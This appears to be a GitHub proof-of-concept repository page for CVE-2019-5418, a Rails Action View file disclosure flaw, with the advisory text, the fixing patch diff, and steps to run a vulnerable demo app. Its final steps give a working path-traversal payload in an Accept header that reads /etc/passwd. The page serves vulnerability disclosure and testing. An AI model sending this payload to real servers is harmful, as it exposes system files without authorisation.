Skip to content
CVE-2019-5418 - File Content Disclosure on Rails
Branch: master
Clone or download
Latest commit be10e3a Mar 25, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
demo Add demo rails app Mar 16, 2019
README.md Update README.md Mar 25, 2019

README.md

CVE-2019-5418 - File Content Disclosure on Rails

EDIT: this CVE can lead to a Remote Code Execution, more info: https://github.com/mpgn/Rails-doubletap-RCE

There is a possible file content disclosure vulnerability in Action View. Specially crafted accept headers in combination with calls to render file: can cause arbitrary files on the target server to be rendered, disclosing the file contents.

The impact is limited to calls to render which render file contents without a specified accept format. Impacted code in a controller looks something like this:

found by John Hawthorn from GitHub

image

Technical Analysis:

Security Advisory:

Fixed in Action View 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1

From f4c70c2222180b8d9d924f00af0c7fd632e26715 Mon Sep 17 00:00:00 2001
From: John Hawthorn <john@hawthorn.email>
Date: Mon, 4 Mar 2019 18:24:51 -0800
Subject: [PATCH] Only accept formats from registered mime types

[CVE-2019-5418]
[CVE-2019-5419]
---
 .../lib/action_dispatch/http/mime_negotiation.rb   |  5 +++++
 actionpack/test/controller/mime/respond_to_test.rb | 10 ++++++----
 .../new_base/content_negotiation_test.rb           | 14 ++++++++++++--
 3 files changed, 23 insertions(+), 6 deletions(-)

diff --git a/actionpack/lib/action_dispatch/http/mime_negotiation.rb b/actionpack/lib/action_dispatch/http/mime_negotiation.rb
index 498b1e669576..4e81ba12a58b 100644
--- a/actionpack/lib/action_dispatch/http/mime_negotiation.rb
+++ b/actionpack/lib/action_dispatch/http/mime_negotiation.rb
@@ -79,6 +79,11 @@ def formats
           else
             [Mime[:html]]
           end
+
+          v = v.select do |format|
+            format.symbol || format.ref == "*/*"
+          end
+
           set_header k, v
         end
       end

Proof Of Concept

  1. Run the vulnerable application inside the demo folder:
foo@bar:~$ cd demo/
foo@bar:~$ bundle install
[...]
foo@bar:~$ rails s                                                                                                                12:59:54
=> Booting Puma
=> Rails 5.2.1 application starting in development 
=> Run `rails server -h` for more startup options
Puma starting in single mode...
* Version 3.12.0 (ruby 2.5.1-p57), codename: Llamas in Pajamas
* Min threads: 5, max threads: 5
* Environment: development
* Listening on tcp://0.0.0.0:3000
Use Ctrl-C to stop
Started GET "/" for 127.0.0.1 at 2019-03-16 13:00:00 +0100
Processing by Rails::WelcomeController#index as HTML
  Rendering /var/lib/gems/2.5.0/gems/railties-5.2.1/lib/rails/templates/rails/welcome/index.html.erb
  Rendered /var/lib/gems/2.5.0/gems/railties-5.2.1/lib/rails/templates/rails/welcome/index.html.erb (1.4ms)
Completed 200 OK in 8ms (Views: 2.7ms | ActiveRecord: 0.0ms)


Started GET "/chybeta" for 127.0.0.1 at 2019-03-16 13:00:03 +0100
Processing by ChybetaController#index as HTML
  Rendering README.md within layouts/application
  Rendered README.md within layouts/application (0.2ms)
Completed 200 OK in 122ms (Views: 121.1ms | ActiveRecord: 0.0ms)
  1. Go to the route /chybeta
  2. Intercept with burp the request and replace the Accept header with Accept: ../../../../../../../../../../etc/passwd{{

image

image

You can’t perform that action at this time.